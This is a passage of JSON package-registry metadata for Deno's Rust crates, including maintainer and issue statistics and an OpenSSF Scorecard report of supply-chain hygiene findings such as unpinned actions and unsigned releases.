33.56849020691349,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":51.7598903010581},"purl":"pkg:cargo/deno_resolver","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_resolver","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_resolver","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_resolver/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_resolver/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_resolver/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_resolver/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_resolver/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_resolver/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_resolver/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2024-09-29T18:44:15.156Z","updated_at":"2024-09-29T18:44:15.156Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2024-09-29T18:44:15.953Z","updated_at":"2024-09-29T18:44:15.953Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":9206822,"name":"deno_permissions","ecosystem":"cargo","description":"Provides the deno permissions implementation.","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":116,"first_release_published_at":"2024-03-13T16:42:53.511Z","latest_release_published_at":"2026-08-06T11:45:13.447Z","latest_release_number":"0.116.0","last_synced_at":"2026-08-29T21:57:41.539Z","created_at":"2024-03-13T16:47:36.974Z","updated_at":"2026-08-29T21:57:41.539Z","registry_url":"https://crates.io/crates/deno_permissions/","install_command":"cargo install deno_permissions","documentation_url":"https://docs.rs/deno_permissions/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed 